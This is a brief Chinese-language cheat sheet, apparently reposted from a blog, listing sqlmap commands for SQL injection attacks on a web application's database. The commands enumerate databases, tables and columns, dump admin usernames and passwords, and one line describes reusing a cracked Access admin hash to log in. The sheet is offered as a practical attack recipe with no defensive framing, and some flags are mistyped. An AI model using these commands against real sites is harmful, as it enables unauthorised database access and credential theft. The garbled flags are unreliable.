SQLmap数据库注入攻击

来源:互联网 发布:网店转让 知乎 编辑:程序博客网 时间:2024/05/23 02:04
指令:
  • sqlmap -u url    扫描注入点扫描目标主机。(url前提是存在漏洞)
  • sqlmap -u url  --users 获取到用户名
  • sqlmap -u url  --dbs 爆出该sqlserver中所有数据库名称

  • sqlmap -u url  --current -db  爆出当前web使用的数据库
  • sqlmap -u url  --current -user web数据库使用的账户
  • sqlmap -u url  -D (指定数据库名称) --tables  列出数据库中的表
  • sqlmap -u url  -D 数据库名称 -T(指定要列出字段的表) --columns (指定列出字段)
  • sqlmap -u url -D** -T** -C“指定要爆的字段” --dump(导出)
  • <--start 1 --stop 10 --dump 第1到第10行>

  • sqlmap -u url  --dump -tables 探测数据库和表的信息
  • sqlmap -u url  --dump -T admin -C admin,password 进行暴库,获得用户名和密码


  • sqlmap:盲推理SQL注入,UNION查询SQL注入,堆查询,基于时间的SQL盲注。
  • ***acess中 爆破后,admin加密为bfpms 将bfpms填到password字段中,就可以使用admin
  • http://blog.csdn.net/zgyulongfei/article/details/41017493/(sqlmap简单使用说明)